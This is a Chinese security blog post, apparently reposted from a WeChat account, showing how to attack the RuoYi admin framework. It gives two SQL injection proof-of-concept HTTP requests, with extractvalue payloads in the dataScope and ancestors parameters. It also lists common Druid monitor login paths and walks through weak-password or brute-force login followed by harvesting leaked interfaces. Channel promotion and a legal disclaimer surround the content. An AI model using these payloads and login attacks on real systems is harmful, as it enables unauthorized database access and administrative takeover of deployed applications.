扫码加圈子
获内部资料
网络安全领域各种资源,EDUSRC证书站挖掘、红蓝攻防、渗透测试等优质文章,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。加内部圈子,文末有彩蛋(知识星球优惠卷)。
漏洞一:SQL注入漏洞
都是POST请求方式
注入点一::在/system/role/list接口的params[dataScope]参数
POC如下:
POST /system/role/list HTTP/1.1Host: Content-Length: 179sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Cookie: Connection: closepageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=¶ms[beginTime]=¶ms[endTime]=¶ms[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e)
注入点二:/system/dept/edit ancestors参数存在SQL漏洞
RuoYi v4.6版本
POC 如下:
POST/system/dept/editHTTP/1.1Host: Content-Length: 179sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Cookie: Connection: closeDeptName=1&deptid=100&ParentId=12&Status=0&ordernum=1&ancestors=0)or(extractvalue(1,concat((selectuser()))));#
其中最简单的测试方式就是直接把url以及cookie值拿到若依工具去检测
这里需要注意的是这个小饼干插件,新版本的若依系统的cookie值是Admin-Token值且是JWT编码的,右边的是老版本的,就是jsessionid值
漏洞二:druid页面渗透
可以看到bp数据包里面有很多的/prod-api接口,其实看若依系统多的师傅们都这到这个接口就是若依框架的常见的一个关键字接口
druid常见访问路径:
/druid/index.html/druid/login.html/prod-api/druid/login.html/prod-api/druid/index.html/dev-api/druid/login.html/dev-api/druid/index.html/api/druid/login.html/api/druid/index.html/admin/druid/login.html/admin-api/druid/login.html
直接访问这个常用的路径,直接爆出来了druid的登录后台的页面,这样我们就是可以尝试使用弱口令登录,或者通过bp抓包然后进行账号密码爆破,账号一般是admin
下面就直接利用弱口令登录成功了,然后后面就可以尝试打下druid的nday漏洞了
可以看到在URL监控里面泄露了很多的敏感信息接口
然后还可以使用swagger插件进行信息泄露的利用
原文始发于微信公众号(神农Sec):若依系统 | SQL注入漏洞+druid框架漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论